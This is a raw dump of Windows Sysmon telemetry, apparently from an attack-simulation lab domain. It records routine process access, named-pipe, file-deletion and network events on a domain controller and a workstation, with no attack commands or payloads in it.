10341000x800000000000000078045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.092{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFE-607E-1D0E-00000000BB01}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.060{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.060{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.060{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078041Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.060{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078040Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.045{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBFE-607E-1C0E-00000000BB01}6420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.045{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFE-607E-1C0E-00000000BB01}6420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.045{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFE-607E-1C0E-00000000BB01}6420C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.014{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Config.Msi\d08299.rbsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000078029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.014{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFDEA9E51ED166131E.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000078028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.014{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF0A1CF5B33A781115.TMPMD5=C57A5F42EC0DD0F75D2080D4387EB8BA,SHA256=3DB340FD6A5320E41C2B4F9832F13D8C1ECFFDEC82F863A2CDF31D3FE6275768,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:06.007{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000050473Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:06.665{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C1A51A48235AC012D1E22772D1211F15,SHA256=E0881D2FE77F2A6A419EDEB12FC9E0F7CFC86A7B827F4D0EF76F5420F448301F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050472Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:04.056{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62012-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050471Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:06.337{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DE44B332721A2D556A4FB7F836A0DAF,SHA256=EECCCC262E139551905DD052A4F7800B804516F9FB63AEFD2F29BD65D12AF0C5,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.967{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-2B0E-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.951{A7A01FEF-B626-607E-1600-00000000BB01}15401856C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.951{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.951{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFF-607E-2B0E-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.951{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFF-607E-2B0E-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.935{A7A01FEF-B624-607E-0B00-00000000BB01}8602320C:\Windows\system32\lsass.exe{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.935{A7A01FEF-B624-607E-0B00-00000000BB01}8602320C:\Windows\system32\lsass.exe{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.935{A7A01FEF-B626-607E-1600-00000000BB01}15401856C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.935{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.920{A7A01FEF-B624-607E-0B00-00000000BB01}8602320C:\Windows\system32\lsass.exe{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.920{A7A01FEF-B624-607E-0B00-00000000BB01}8602320C:\Windows\system32\lsass.exe{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.920{A7A01FEF-C0A3-607E-6C05-00000000BB01}36242592C:\Windows\system32\csrss.exe{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.920{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-290E-00000000BB01}3924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.904{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 